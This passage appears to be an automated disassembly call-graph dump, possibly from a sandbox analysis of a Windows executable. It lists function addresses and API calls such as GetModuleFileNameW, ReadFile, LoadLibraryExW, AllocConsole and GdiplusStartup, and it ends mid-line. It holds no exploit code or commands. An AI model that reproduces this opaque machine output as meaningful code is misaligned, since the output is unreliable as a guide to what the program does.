19374 e98617 19371->19374 19372->19335 19375 e98592 ___vcrt_InitializeCriticalSectionEx 5 API calls 19374->19375 19376 e98631 19375->19376 19377 e98649 TlsFree 19376->19377 19378 e9863d 19376->19378 19377->19378 19378->19372 19380 ea09f7 19379->19380 19383 ea09f3 19379->19383 19380->19383 19385 e9efc0 19380->19385 19382 e93bf3 19382->19205 19382->19316 19397 e9494c 19383->19397 19386 e9efcc __FrameHandler3::FrameUnwindToState 19385->19386 19404 e9f5b1 EnterCriticalSection 19386->19404 19388 e9efd3 19405 ea0ea8 19388->19405 19390 e9efe2 19391 e9eff1 19390->19391 19418 e9ee49 GetStartupInfoW 19390->19418 19429 e9f00d 19391->19429 19395 e9f002 _abort 19395->19380 19398 e94955 IsProcessorFeaturePresent 19397->19398 19399 e94954 19397->19399 19401 e94997 19398->19401 19399->19382 19579 e9495a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19401->19579 19403 e94a7a 19403->19382 19404->19388 19406 ea0eb4 __FrameHandler3::FrameUnwindToState 19405->19406 19407 ea0ed8 19406->19407 19408 ea0ec1 19406->19408 19432 e9f5b1 EnterCriticalSection 19407->19432 19440 e9da7d 19408->19440 19411 ea0ee4 19414 ea0f10 19411->19414 19433 ea0df9 19411->19433 19446 ea0f37 19414->19446 19415 ea0ed0 _abort 19415->19390 19419 e9eef8 19418->19419 19420 e9ee66 19418->19420 19424 e9eeff 19419->19424 19420->19419 19421 ea0ea8 27 API calls 19420->19421 19422 e9ee8f 19421->19422 19422->19419 19423 e9eebd GetFileType 19422->19423 19423->19422 19425 e9ef06 19424->19425 19426 e9ef49 GetStdHandle 19425->19426 19427 e9efb1 19425->19427 19428 e9ef5c GetFileType 19425->19428 19426->19425 19427->19391 19428->19425 19578 e9f601 LeaveCriticalSection 19429->19578 19431 e9f014 19431->19395 19432->19411 19449 e9fab6 19433->19449 19435 ea0e18 19463 e9d758 19435->19463 19436 ea0e0b 19436->19435 19456 e9f88a 19436->19456 19439 ea0e6a 19439->19411 19498 e9e189 GetLastError 19440->19498 19443 e9d95c 19556 e9d8e1 19443->19556 19445 e9d968 19445->19415 19577 e9f601 LeaveCriticalSection 19446->19577 19448 ea0f3e 19448->19415 19454 e9fac3 _abort 19449->19454 19450 e9fb03 19453 e9da7d __dosmaperr 19 API calls 19450->19453 19451 e9faee RtlAllocateHeap 19452 e9fb01 19451->19452 19451->19454 19452->19436 19453->19452 19454->19450 19454->19451 19469 e9c3df 19454->19469 19484 e9f618 19456->19484 19459 e9f8ba 19461 e9494c _ValidateLocalCookies 5 API calls 19459->19461 19460 e9f8cf InitializeCriticalSectionAndSpinCount 19460->19459 19462 e9f8e6 19461->19462 19462->19436 19464 e9d78c __dosmaperr 19463->19464 19465 e9d763 RtlFreeHeap 19463->19465 19464->19439 19465->19464 19466 e9d778 19465->19466 19467 e9da7d __dosmaperr 18 API calls 19466->19467 19468 e9d77e GetLastError 19467->19468 19468->19464 19474 e9c423 19469->19474 19471 e9494c _ValidateLocalCookies 5 API calls 19472 e9c41f 19471->19472 19472->19454 19473 e9c3f5 19473->19471 19475 e9c42f __FrameHandler3::FrameUnwindToState 19474->19475 19480 e9f5b1 EnterCriticalSection 19475->19480 19477 e9c43a 19481 e9c46c 19477->19481 19479 e9c461 _abort 19479->19473 19480->19477 19482 e9f601 _abort LeaveCriticalSection 19481->19482 19483 e9c473 19482->19483 19483->19479 19485 e9f644 19484->19485 19486 e9f648 19484->19486 19485->19486 19488 e9f668 19485->19488 19491 e9f6b4 19485->19491 19486->19459 19486->19460 19488->19486 19489 e9f674 GetProcAddress 19488->19489 19490 e9f684 _abort 19489->19490 19490->19486 19492 e9f6d5 LoadLibraryExW 19491->19492 19493 e9f6ca 19491->19493 19494 e9f70a 19492->19494 19495 e9f6f2 GetLastError 19492->19495 19493->19485 19494->19493 19496 e9f721 FreeLibrary 19494->19496 19495->19494 19497 e9f6fd LoadLibraryExW 19495->19497 19496->19493 19497->19494 19499 e9e1a8 19498->19499 19500 e9e1a2 19498->19500 19501 e9fab6 _abort 17 API calls 19499->19501 19505 e9e1ff SetLastError 19499->19505 19517 e9f7db 19500->19517 19503 e9e1ba 19501->19503 19504 e9e1c2 19503->19504 19524 e9f831 19503->19524 19508 e9d758 _free 17 API calls 19504->19508 19506 e9da82 19505->19506 19506->19443 19510 e9e1c8 19508->19510 19512 e9e1f6 SetLastError 19510->19512 19511 e9e1de 19531 e9df6c 19511->19531 19512->19506 19515 e9d758 _free 17 API calls 19516 e9e1ef 19515->19516 19516->19505 19516->19512 19518 e9f618 _abort 5 API calls 19517->19518 19519 e9f802 19518->19519 19520 e9f81a TlsGetValue 19519->19520 19523 e9f80e 19519->19523 19520->19523 19521 e9494c _ValidateLocalCookies 5 API calls 19522 e9f82b 19521->19522 19522->19499 19523->19521 19525 e9f618 _abort 5 API calls 19524->19525 19526 e9f858 19525->19526 19527 e9f873 TlsSetValue 19526->19527 19530 e9f867 19526->19530 19527->19530 19528 e9494c _ValidateLocalCookies 5 API calls 19529 e9e1d7 19528->19529 19529->19504 19529->19511 19530->19528 19536 e9df44 19531->19536 19542 e9de84 19536->19542 19538 e9df68 19539 e9def4 19538->19539 19548 e9dd88 19539->19548 19541 e9df18 19541->19515 19543 e9de90 __FrameHandler3::FrameUnwindToState 19542->19543 19544 e9f5b1 _abort EnterCriticalSection 19543->19544 19545 e9de9a 19544->19545 19546 e9dec0 _abort LeaveCriticalSection 19545->19546 19547 e9deb8 _abort 19546->19547 19547->19538 19549 e9dd94 __FrameHandler3::FrameUnwindToState 19548->19549 19550 e9f5b1 _abort EnterCriticalSection 19549->19550 19551 e9dd9e 19550->19551 19552 e9e0ba _abort 20 API calls 19551->19552 19553 e9ddb6 19552->19553 19554 e9ddcc _abort LeaveCriticalSection 19553->19554 19555 e9ddc4 _abort 19554->19555 19555->19541 19557 e9e189 _abort 20 API calls 19556->19557 19558 e9d8f7 19557->19558 19559 e9d956 19558->19559 19560 e9d905 19558->19560 19567 e9d96c IsProcessorFeaturePresent 19559->19567 19564 e9494c _ValidateLocalCookies 5 API calls 19560->19564 19562 e9d95b 19563 e9d8e1 ___std_exception_copy 26 API calls 19562->19563 19565 e9d968 19563->19565 19566 e9d92c 19564->19566 19565->19445 19566->19445 19568 e9d977 19567->19568 19571 e9d792 19568->19571 19572 e9d7ae _abort 19571->19572 19573 e9d7da IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19572->19573 19576 e9d8ab _abort 19573->19576 19574 e9494c _ValidateLocalCookies 5 API calls 19575 e9d8c9 GetCurrentProcess TerminateProcess 19574->19575 19575->19562 19576->19574 19577->19448 19578->19431 19579->19403 19581 e9468f GetStartupInfoW 19580->19581 19581->19212 19583 ea04c2 19582->19583 19584 ea04b9 19582->19584 19583->19216 19589 ea03a7 19584->19589 19958 ea07e2 19586->19958 19609 e9e105 GetLastError 19589->19609 19591 ea03b4 19629 ea04ce 19591->19629 19593 ea03bc 19638 ea013b 19593->19638 19596 ea03d3 19596->19583 19600 e9d758 _free 20 API calls 19600->19596 19602 ea0411 19603 e9da7d __dosmaperr 20 API calls 19602->19603 19608 ea0416 19603->19608 19604 ea045a 19604->19608 19662 ea0011 19604->19662 19605 ea042e 19605->19604 19606 e9d758 _free 20 API calls 19605->19606 19606->19604 19608->19600 19610 e9e11b 19609->19610 19611 e9e121 19609->19611 19612 e9f7db _abort 11 API calls 19610->19612 19613 e9fab6 _abort 20 API calls 19611->19613 19615 e9e170 SetLastError 19611->19615 19612->19611 19614 e9e133 19613->19614 19616 e9e13b 19614->19616 19617 e9f831 _abort 11 API calls 19614->19617 19615->19591 19619 e9d758 _free 20 API calls 19616->19619 19618 e9e150 19617->19618 19618->19616 19620 e9e157 19618->19620 19621 e9e141 19619->19621 19622 e9df6c _abort 20 API calls 19620->19622 19623 e9e17c SetLastError 19621->19623 19624 e9e162 19622->19624 19665 e9d6b0 19623->19665 19626 e9d758 _free 20 API calls 19624->19626 19628 e9e169 19626->19628 19628->19615 19628->19623 19630 ea04da __FrameHandler3::FrameUnwindToState 19629->19630 19631 e9e105 _abort 38 API calls 19630->19631 19632 ea04e4 19631->19632 19635 ea0568 _abort 19632->19635 19636 e9d6b0 _abort 38 API calls 19632->19636 19637 e9d758 _free 20 API calls 19632->19637 19733 e9f5b1 EnterCriticalSection 19632->19733 19734 ea055f 19632->19734 19635->19593 19636->19632 19637->19632 19738 e98ece 19638->19738 19641 ea016e 19643 ea0185 19641->19643 19644 ea0173 GetACP 19641->19644 19642 ea015c GetOEMCP 19642->19643 19643->19596 19645 e9da90 19643->19645 19644->19643 19646 e9dace 19645->19646 19650 e9da9e _abort 19645->19650 19647 e9da7d __dosmaperr 20 API calls 19646->19647 19649 e9dacc 19647->19649 19648 e9dab9 RtlAllocateHeap 19648->19649 19648->19650 19649->19608 19652 ea0570 19649->19652 19650->19646 19650->19648 19651 e9c3df _abort 7 API calls 19650->19651 19651->19650 19653 ea013b 40 API calls 19652->19653 19654 ea058f 19653->19654 19656 ea05e0 IsValidCodePage 19654->19656 19659 ea0596 19654->19659 19661 ea0605 _abort 19654->19661 19655 e9494c _ValidateLocalCookies 5 API calls 19657 ea0409 19655->19657 19658 ea05f2 GetCPInfo 19656->19658 19656->19659 19657->19602 19657->19605 19658->19659 19658->19661 19659->19655 19849 ea0213 GetCPInfo 19661->19849 19922 e9ffce 19662->19922 19676 ea0b96 19665->19676 19668 e9d6c0 19670 e9d6ca IsProcessorFeaturePresent 19668->19670 19675 e9d6e8 19668->19675 19672 e9d6d5 19670->19672 19671 e9c84f _abort 28 API calls 19673 e9d6f2 19671->19673 19674 e9d792 _abort 8 API calls 19672->19674 19674->19675 19675->19671 19706 ea0b04 19676->19706 19679 ea0bf1 19680 ea0bfd _abort 19679->19680 19681 ea0c24 _abort 19680->19681 19682 e9e189 _abort 20 API calls 19680->19682 19685 ea0c2a _abort 19680->19685 19683 ea0c76 19681->19683 19681->19685 19705 ea0c59 19681->19705 19682->19681 19684 e9da7d __dosmaperr 20 API calls 19683->19684 19686 ea0c7b 19684->19686 19691 ea0ca2 19685->19691 19720 e9f5b1 EnterCriticalSection 19685->19720 19687 e9d95c ___std_exception_copy 26 API calls 19686->19687 19687->19705 19693 ea0d01 19691->19693 19695 ea0cf9 19691->19695 19702 ea0d2c 19691->19702 19721 e9f601 LeaveCriticalSection 19691->19721 19693->19702 19722 ea0be8 19693->19722 19696 e9c84f _abort 28 API calls 19695->19696 19696->19693 19699 e9e105 _abort 38 API calls 19703 ea0d8f 19699->19703 19701 ea0be8 _abort 38 API calls 19701->19702 19725 ea0db1 19702->19725 19704 e9e105 _abort 38 API calls 19703->19704 19703->19705 19704->19705 19729 ea6d20 19705->19729 19709 ea0aaa 19706->19709 19708 e9d6b5 19708->19668 19708->19679 19710 ea0ab6 __FrameHandler3::FrameUnwindToState 19709->19710 19715 e9f5b1 EnterCriticalSection 19710->19715 19712 ea0ac4 19716 ea0af8 19712->19716 19714 ea0aeb _abort 19714->19708 19715->19712 19719 e9f601 LeaveCriticalSection 19716->19719 19718 ea0b02 19718->19714 19719->19718 19720->19691 19721->19695 19723 e9e105 _abort 38 API calls 19722->19723 19724 ea0bed 19723->19724 19724->19701 19726 ea0d80 19725->19726 19727 ea0db7 19725->19727 19726->19699 19726->19703 19726->19705 19732 e9f601 LeaveCriticalSection 19727->19732 19730 e9494c _ValidateLocalCookies 5 API calls 19729->19730 19731 ea6d2a 19730->19731 19731->19731 19732->19726 19733->19632 19737 e9f601 LeaveCriticalSection 19734->19737 19736 ea0566 19736->19632 19737->19736 19739 e98eeb 19738->19739 19740 e98ee1 19738->19740 19739->19740 19741 e9e105 _abort 38 API calls 19739->19741 19740->19641 19740->19642 19742 e98f0c 19741->19742 19746 e9e25a 19742->19746 19747 e9e26d 19746->19747 19748 e98f25 19746->19748 19747->19748 19754 ea16ef 19747->19754 19750 e9e287 19748->19750 19751 e9e29a 19750->19751 19752 e9e2af 19750->19752 19751->19752 19753 ea04ce __fassign 38 API calls 19751->19753 19752->19740 19753->19752 19755 ea16fb __FrameHandler3::FrameUnwindToState 19754->19755 19756 e9e105 _abort 38 API calls 19755->19756 19757 ea1704 19756->19757 19765 ea1752 _abort 19757->19765 19766 e9f5b1 EnterCriticalSection 19757->19766 19759 ea1722 19767 ea1766 19759->19767 19764 e9d6b0 _abort 38 API calls 19764->19765 19765->19748 19766->19759 19768 ea1774 __fassign 19767->19768 19770 ea1736 19767->19770 19768->19770 19774 ea14a2 19768->19774 19771 ea1755 19770->19771 19848 e9f601 LeaveCriticalSection 19771->19848 19773 ea1749 19773->19764 19773->19765 19776 ea1522 19774->19776 19777 ea14b8 19774->19777 19778 e9d758 _free 20 API calls 19776->19778 19800 ea1570 19776->19800 19777->19776 19782 e9d758 _free 20 API calls 19777->19782 19784 ea14eb 19777->19784 19779 ea1544 19778->19779 19780 e9d758 _free 20 API calls 19779->19780 19785 ea1557 19780->19785 19781 e9d758 _free 20 API calls 19786 ea1517 19781->19786 19788 ea14e0 19782->19788 19783 ea157e 19787 ea15de 19783->19787 19801 e9d758 20 API calls _free 19783->19801 19789 e9d758 _free 20 API calls 19784->19789 19799 ea150d 19784->19799 19790 e9d758 _free 20 API calls 19785->19790 19791 e9d758 _free 20 API calls 19786->19791 19792 e9d758 _free 20 API calls 19787->19792 19802 ea1081 19788->19802 19794 ea1502 19789->19794 19795 ea1565 19790->19795 19791->19776 19798 ea15e4 19792->19798 19830 ea117f 19794->19830 19797 e9d758 _free 20 API calls 19795->19797 19797->19800 19798->19770 19799->19781 19842 ea1615 19800->19842 19801->19783 19803 ea1092 19802->19803 19829 ea117b 19802->19829 19804 ea10a3 19803->19804 19805 e9d758 _free 20 API calls 19803->19805 19806 ea10b5 19804->19806 19807 e9d758 _free 20 API calls 19804->19807 19805->19804 19808 ea10c7 19806->19808 19809 e9d758 _free 20 API calls 19806->19809 19807->19806 19810 ea10d9 19808->19810 19812 e9d758 _free 20 API calls 19808->19812 19809->19808 19811 ea10eb 19810->19811 19813 e9d758 _free 20 API calls 19810->19813 19814 ea10fd 19811->19814 19815 e9d758 _free 20 API calls 19811->19815 19812->19810 19813->19811 19816 ea110f 19814->19816 19817 e9d758 _free 20 API calls 19814->19817 19815->19814 19818 e9d758 _free 20 API calls 19816->19818 19820 ea1121 19816->19820 19817->19816 19818->19820 19819 e9d758 _free 20 API calls 19821 ea1133 19819->19821 19820->19819 19820->19821 19822 e9d758 _free 20 API calls 19821->19822 19824 ea1145 19821->19824 19822->19824 19823 ea1157 19826 ea1169 19823->19826 19827 e9d758 _free 20 API calls 19823->19827 19824->19823 19825 e9d758 _free 20 API calls 19824->19825 19825->19823 19828 e9d758 _free 20 API calls 19826->19828 19826->19829 19827->19826 19828->19829 19829->19784 19831 ea118c 19830->19831 19841 ea11e4 19830->19841 19832 ea119c 19831->19832 19833 e9d758 _free 20 API calls 19831->19833 19834 ea11ae 19832->19834 19836 e9d758 _free 20 API calls 19832->19836 19833->19832 19835 ea11c0 19834->19835 19837 e9d758 _free 20 API calls 19834->19837 19838 e9d758 _free 20 API calls 19835->19838 19839 ea11d2 19835->19839 19836->19834 19837->19835 19838->19839 19840 e9d758 _free 20 API calls 19839->19840 19839->19841 19840->19841 19841->19799 19843 ea1622 19842->19843 19847 ea1640 19842->19847 19844 ea1224 __fassign 20 API calls 19843->19844 19843->19847 19845 ea163a 19844->19845 19846 e9d758 _free 20 API calls 19845->19846 19846->19847 19847->19783 19848->19773 19850 ea02f7 19849->19850 19851 ea024d 19849->19851 19854 e9494c _ValidateLocalCookies 5 API calls 19850->19854 19859 ea1308 19851->19859 19856 ea03a3 19854->19856 19856->19659 19858 e9f501 __vsnwprintf_l 43 API calls 19858->19850 19860 e98ece __fassign 38 API calls 19859->19860 19861 ea1328 MultiByteToWideChar 19860->19861 19863 ea13fe 19861->19863 19864 ea1366 19861->19864 19865 e9494c _ValidateLocalCookies 5 API calls 19863->19865 19866 e9da90 __vsnwprintf_l 21 API calls 19864->19866 19869 ea1387 _abort __vsnwprintf_l 19864->19869 19867 ea02ae 19865->19867 19866->19869 19873 e9f501 19867->19873 19868 ea13f8 19878 e9f54c 19868->19878 19869->19868 19871 ea13cc MultiByteToWideChar 19869->19871 19871->19868 19872 ea13e8 GetStringTypeW 19871->19872 19872->19868 19874 e98ece __fassign 38 API calls 19873->19874 19875 e9f514 19874->19875 19882 e9f2e4 19875->19882 19879 e9f558 19878->19879 19880 e9f569 19878->19880 19879->19880 19881 e9d758 _free 20 API calls 19879->19881 19880->19863 19881->19880 19883 e9f2ff __vsnwprintf_l 19882->19883 19884 e9f325 MultiByteToWideChar 19883->19884 19885 e9f4d9 19884->19885 19886 e9f34f 19884->19886 19887 e9494c _ValidateLocalCookies 5 API calls 19885->19887 19889 e9da90 __vsnwprintf_l 21 API calls 19886->19889 19892 e9f370 __vsnwprintf_l 19886->19892 19888 e9f4ec 19887->19888 19888->19858 19889->19892 19890 e9f3b9 MultiByteToWideChar 19891 e9f425 19890->19891 19893 e9f3d2 19890->19893 19895 e9f54c __freea 20 API calls 19891->19895 19892->19890 19892->19891 19909 e9f8ec 19893->19909 19895->19885 19910 e9f618 _abort 5 API calls 19909->19910 19911 e9f913 19910->19911 19914 e9f91c 19911->19914 19917 e9f974 19911->19917 19923 e9ffda __FrameHandler3::FrameUnwindToState 19922->19923 19930 e9f5b1 EnterCriticalSection 19923->19930 19925 e9ffe4 19931 ea0039 19925->19931 19929 e9fffd _abort 19930->19925 19943 ea0761 19931->19943 19933 ea0087 19934 ea0761 __vsnwprintf_l 26 API calls 19933->19934 19935 ea00a3 19934->19935 19936 ea0761 __vsnwprintf_l 26 API calls 19935->19936 19937 ea00c1 19936->19937 19938 e9fff1 19937->19938 19939 e9d758 _free 20 API calls 19937->19939 19940 ea0005 19938->19940 19939->19938 19957 e9f601 LeaveCriticalSection 19940->19957 19942 ea000f 19942->19929 19944 ea0772 19943->19944 19947 ea076e __InternalCxxFrameHandler 19943->19947 19945 ea0779 19944->19945 19949 ea078c _abort 19944->19949 19946 e9da7d __dosmaperr 20 API calls 19945->19946 19948 ea077e 19946->19948 19947->19933 19950 e9d95c ___std_exception_copy 26 API calls 19948->19950 19949->19947 19951 ea07ba 19949->19951 19952 ea07c3 19949->19952 19950->19947 19953 e9da7d __dosmaperr 20 API calls 19951->19953 19952->19947 19955 e9da7d __dosmaperr 20 API calls 19952->19955 19954 ea07bf 19953->19954 19956 e9d95c ___std_exception_copy 26 API calls 19954->19956 19955->19954 19956->19947 19957->19942 19959 e98ece __fassign 38 API calls 19958->19959 19960 ea07f6 19959->19960 19960->19216 20072 e93ac0 19961->20072 19964 e86c13 19966 e86f40 GetModuleFileNameW 19964->19966 20083 e9bf0d 19964->20083 19965 e86bb4 GetProcAddress 19967 e86bcd 19965->19967 19968 e86be5 GetProcAddress 19965->19968 19977 e86f5e 19966->19977 19967->19968 19970 e86bf7 19968->19970 19970->19964 19972 e86e8b GetModuleFileNameW CreateFileW 19973 e86ebb SetFilePointer 19972->19973 19974 e86f34 CloseHandle 19972->19974 19973->19974 19975 e86ec9 ReadFile 19973->19975 19974->19966 19975->19974 19979 e86ee7 19975->19979 19980 e86fc0 GetFileAttributesW 19977->19980 19981 e86fd8 19977->19981 19983 e86f89 CompareStringW 19977->19983 20074 e82c72 19977->20074 20077 e86b47 19977->20077 19979->19974 19982 e86b47 2 API calls 19979->19982 19980->19977 19980->19981 19984 e86fe3 19981->19984 19987 e87018 19981->19987 19982->19979 19983->19977 19986 e86ffc GetFileAttributesW 19984->19986 19988 e87014 19984->19988 19985 e87127 20009 e8f86d GetCurrentDirectoryW 19985->20009 19986->19984 19986->19988 19987->19985 19989 e82c72 GetVersionExW 19987->19989 19988->19987 19990 e87032 19989->19990 19991 e87039 19990->19991 19992 e8709f 19990->19992 19993 e86b47 2 API calls 19991->19993 19994 e839a9 _swprintf 51 API calls 19992->19994 19996 e87043 19993->19996 19995 e870c7 AllocConsole 19994->19995 19997 e8711f ExitProcess 19995->19997 19998 e870d4 GetCurrentProcessId AttachConsole 19995->19998 19999 e86b47 2 API calls 19996->19999 20091 e98793 19998->20091 20001 e8704d 19999->20001 20087 e84c77 20001->20087 20002 e870f5 GetStdHandle WriteConsoleW Sleep FreeConsole 20002->19997 20005 e839a9 _swprintf 51 API calls 20006 e8707b 20005->20006 20007 e84c77 53 API calls 20006->20007 20008 e8708a 20007->20008 20008->19997 20009->19222 20011 e86b47 2 API calls 20010->20011 20012 e8fe4a OleInitialize 20011->20012 20013 e8fe6d GdiplusStartup SHGetMalloc 20012->20013 20013->19224 20198 e81a52 20014->20198 20017 e9071d LoadBitmapW 20018 e9074b GetObjectW 20017->20018 20019 e9073e 20017->20019 20023 e9075a 20018->20023 20490 e8f8e2 FindResourceW 20019->20490 20485 e8f7e6 20023->20485 20025 e907b0 20036 e840a2 20025->20036 20026 e9078c 20506 e8f825 20026->20506 20027 e8f8e2 13 API calls 20029 e9077d 20027->20029 20029->20026 20031 e90783 DeleteObject 20029->20031 20031->20026 20540 e840c7 20036->20540 20056 e9160e 20055->20056 20057 e91724 20056->20057 20058 e87d15 CharUpperW 20056->20058 20870 e85960 20056->20870 20057->19233 20057->19234 20058->20056 20061 e93ac0 20060->20061 20062 e92c03 SetEnvironmentVariableW 20061->20062 20064 e92c26 20062->20064 20063 e92c4e 20063->19241 20064->20063 20065 e92c42 SetEnvironmentVariableW 20064->20065 20065->20063 20073 e86b99 GetModuleHandleW 20072->20073 20073->19964 20073->19965 20075 e82cc2 20074->20075 20076 e82c86 GetVersionExW 20074->20076 20075->19977 20076->20075 20078 e93ac0 20077->20078 20079 e86b54 GetSystemDirectoryW 20078->20079 20080 e86b8a 20079->20080 20081 e86b6c 20079->20081 20080->19977 20082 e86b7d LoadLibraryW 20081->20082 20082->20080 20084 e9bf26 __vswprintf_c_l 20083->20084 20093 e9b54f 20084->20093 20088 e84c87 20087->20088 20152 e84ca8 20088->20152 20092 e9879b 20091->20092 20092->20002 20092->20092 20111 e9a547 20093->20111 20095 e9b59c 20096 e98ece __fassign 38 API calls 20095->20096 20103 e9b5a8 20096->20103 20097 e9b561 20097->20095 20098 e9b576 20097->20098 20110 e86e80 20097->20110 20099 e9da7d __dosmaperr 20 API calls 20098->20099 20100 e9b57b 20099->20100 20101 e9d95c ___std_exception_copy 26 API calls 20100->20101 20101->20110 20104 e9b5d7 20103->20104 20118 e9beda 20103->20118 20107 e9b643 20104->20107 20125 e9be5c 20104->20125 20105 e9be5c __vsnwprintf_l 26 API calls 20108 e9b70a __vswprintf_c_l 20105->20108 20107->20105 20109 e9da7d __dosmaperr 20 API calls 20108->20109 20108->20110 20109->20110 20110->19966 20110->19972 20112 e9a54c 20111->20112 20113 e9a55f 20111->20113 20114 e9da7d __dosmaperr 20 API calls 20112->20114 20113->20097 20115 e9a551 20114->20115 20116 e9d95c ___std_exception_copy 26 API calls 20115->20116 20117 e9a55c 20116->20117 20117->20097 20119 e9befc 20118->20119 20120 e9bee6 20118->20120 20140 e9beb0 20119->20140 20120->20119 20121 e9beee 20120->20121 20131 e9f175 20121->20131 20124 e9befa 20124->20103 20126 e9be6c 20125->20126 20127 e9be80 20125->20127 20126->20127 20128 e9da7d __dosmaperr 20 API calls 20126->20128 20127->20107 20129 e9be75 20128->20129 20130 e9d95c ___std_exception_copy 26 API calls 20129->20130 20130->20127 20132 e98ece __fassign 38 API calls 20131->20132 20133 e9f196 20132->20133 20139 e9f1a0 20133->20139 20144 e9f2ab 20133->20144 20136 e9494c _ValidateLocalCookies 5 API calls 20137 e9f243 20136->20137 20137->20124 20138 ea1308 __vsnwprintf_l 42 API calls 20138->20139 20139->20136 20141 e9bec9 20140->20141 20142 e9bebc 20140->20142 20147 e9f0f0 20141->20147 20142->20124 20145 e98ece __fassign 38 API calls 20144->20145 20146 e9f1c0 20145->20146 20146->20138 20148 e9e105 _abort 38 API calls 20147->20148 20149 e9f0fb 20148->20149 20150 e9e25a __fassign 38 API calls 20149->20150 20151 e9f10b 20150->20151 20151->20142 20158 e84010 20152->20158 20155 e84ccb LoadStringW 20156 e84ca5 20155->20156 20157 e84ce2 LoadStringW 20155->20157 20156->20005 20157->20156 20163 e83f4c 20158->20163 20160 e8402d 20161 e84042 20160->20161 20171 e84050 20160->20171 20161->20155 20161->20156 20164 e83f64 20163->20164 20170 e83fe4 _strncpy 20163->20170 20166 e83f88 20164->20166 20175 e87b46 WideCharToMultiByte 20164->20175 20169 e83fb9 20166->20169 20177 e84c11 20166->20177 20180 e9aa41 20169->20180 20170->20160 20172 e8405f 20171->20172 20174 e84074 20171->20174 20173 e9aa41 26 API calls 20172->20173 20173->20174 20174->20161 20176 e87b73 20175->20176 20176->20166 20188 e84c2b 20177->20188 20181 e9aa5d 20180->20181 20182 e9da7d __dosmaperr 20 API calls 20181->20182 20185 e9aa71 20181->20185 20183 e9aa66 20182->20183 20184 e9d95c ___std_exception_copy 26 API calls 20183->20184 20184->20185 20186 e9494c _ValidateLocalCookies 5 API calls 20185->20186 20187 e9aaf0 20186->20187 20187->20170 20191 e84c46 20188->20191 20192 e84c5d __vsnwprintf_l 20191->20192 20195 e9a848 20192->20195 20196 e987b3 __vsnwprintf_l 50 API calls 20195->20196 20197 e84c27 20196->20197 20197->20169 20199 e81a69 __vsnwprintf_l 20198->20199 20202 e9a86c 20199->20202 20205 e9892f 20202->20205 20206 e9896f 20205->20206 20207 e98957 20205->20207 20206->20207 20209 e98977 20206->20209 20208 e9da7d __dosmaperr 20 API calls 20207->20208 20210 e9895c 20208->20210 20211 e98ece __fassign 38 API calls 20209->20211 20212 e9d95c ___std_exception_copy 26 API calls 20210->20212 20213 e98987 20211->20213 20220 e98967 20212->20220 20222 e98e99 20213->20222 20215 e9494c _ValidateLocalCookies 5 API calls 20217 e81a73 SetEnvironmentVariableW GetModuleHandleW LoadIconW 20215->20217 20217->20017 20220->20215 20223 e98eb8 __vswprintf_c_l 20222->20223 20224 e9da7d __dosmaperr 20 API calls 20223->20224 20225 e989ff 20224->20225 20226 e9927e 20225->20226 20227 e9a547 __vsnwprintf_l 26 API calls 20226->20227 20233 e9928e __vswprintf_c_l 20227->20233 20228 e992a3 20229 e9da7d __dosmaperr 20 API calls 20228->20229 20230 e992a8 20229->20230 20232 e9d95c ___std_exception_copy 26 API calls 20230->20232 20231 e98a0a 20239 e98f51 20231->20239 20232->20231 20233->20228 20233->20231 20242 e99437 20233->20242 20249 e99ce9 20233->20249 20254 e99524 20233->20254 20259 e996b6 20233->20259 20290 e99a61 20233->20290 20240 e9d758 _free 20 API calls 20239->20240 20241 e98f61 20240->20241 20241->20220 20243 e9943c __vswprintf_c_l 20242->20243 20244 e99453 20243->20244 20245 e9da7d __dosmaperr 20 API calls 20243->20245 20244->20233 20246 e99445 20245->20246 20247 e9d95c ___std_exception_copy 26 API calls 20246->20247 20248 e99450 20247->20248 20248->20233 20250 e99cfa 20249->20250 20251 e99cf0 20249->20251 20250->20233 20314 e99104 20251->20314 20255 e9952b 20254->20255 20256 e99535 20254->20256 20257 e99104 __vswprintf_c_l 39 API calls 20255->20257 20256->20233 20258 e99534 20257->20258 20258->20233 20260 e996d9 20259->20260 20261 e996bf 20259->20261 20263 e9da7d __dosmaperr 20 API calls 20260->20263 20277 e9970a 20260->20277 20262 e99af3 20261->20262 20268 e99a88 20261->20268 20261->20277 20266 e99b39 20262->20266 20267 e99afa 20262->20267 20273 e99aca 20262->20273 20264 e996f6 20263->20264 20265 e9d95c ___std_exception_copy 26 API calls 20264->20265 20269 e99701 20265->20269 20367 e9a408 20266->20367 20271 e99aff 20267->20271 20272 e99aa1 20267->20272 20268->20273 20274 e99a94 20268->20274 20269->20233 20271->20273 20278 e99b04 20271->20278 20288 e99aaf __vswprintf_c_l 20272->20288 20289 e99ac3 __vswprintf_c_l 20272->20289 20359 e99f91 20272->20359 20273->20288 20273->20289 20353 e9a22b 20273->20353 20274->20272 20276 e99ada 20274->20276 20274->20288 20276->20289 20339 e9a193 20276->20339 20277->20233 20280 e99b09 20278->20280 20281 e99b17 20278->20281 20280->20289 20343 e9a3e9 20280->20343 20347 e9a375 20281->20347 20283 e9494c _ValidateLocalCookies 5 API calls 20286 e99cba 20283->20286 20286->20233 20288->20289 20370 e9a690 20288->20370 20289->20283 20291 e99a88 20290->20291 20292 e99af3 20290->20292 20300 e99aca 20291->20300 20303 e99a94 20291->20303 20293 e99b39 20292->20293 20294 e99afa 20292->20294 20292->20300 20297 e9a408 __vsnwprintf_l 26 API calls 20293->20297 20295 e99aff 20294->20295 20296 e99aa1 20294->20296 20299 e99b04 20295->20299 20295->20300 20298 e99f91 __vswprintf_c_l 48 API calls 20296->20298 20302 e99ac3 __vswprintf_c_l 20296->20302 20313 e99aaf __vswprintf_c_l 20296->20313 20297->20313 20298->20313 20305 e99b09 20299->20305 20306 e99b17 20299->20306 20300->20302 20304 e9a22b __vsnwprintf_l 26 API calls 20300->20304 20300->20313 20301 e99ada 20301->20302 20309 e9a193 __vswprintf_c_l 40 API calls 20301->20309 20308 e9494c _ValidateLocalCookies 5 API calls 20302->20308 20303->20296 20303->20301 20303->20313 20304->20313 20305->20302 20310 e9a3e9 __vsnwprintf_l 26 API calls 20305->20310 20307 e9a375 __vsnwprintf_l 26 API calls 20306->20307 20307->20313 20311 e99cba 20308->20311 20309->20313 20310->20313 20311->20233 20312 e9a690 __vswprintf_c_l 40 API calls 20312->20302 20313->20302 20313->20312 20317 e9db0a 20314->20317 20318 e9db25 __vswprintf_c_l 20317->20318 20321 e9b777 20318->20321 20322 e9a547 __vsnwprintf_l 26 API calls 20321->20322 20325 e9b789 20322->20325 20323 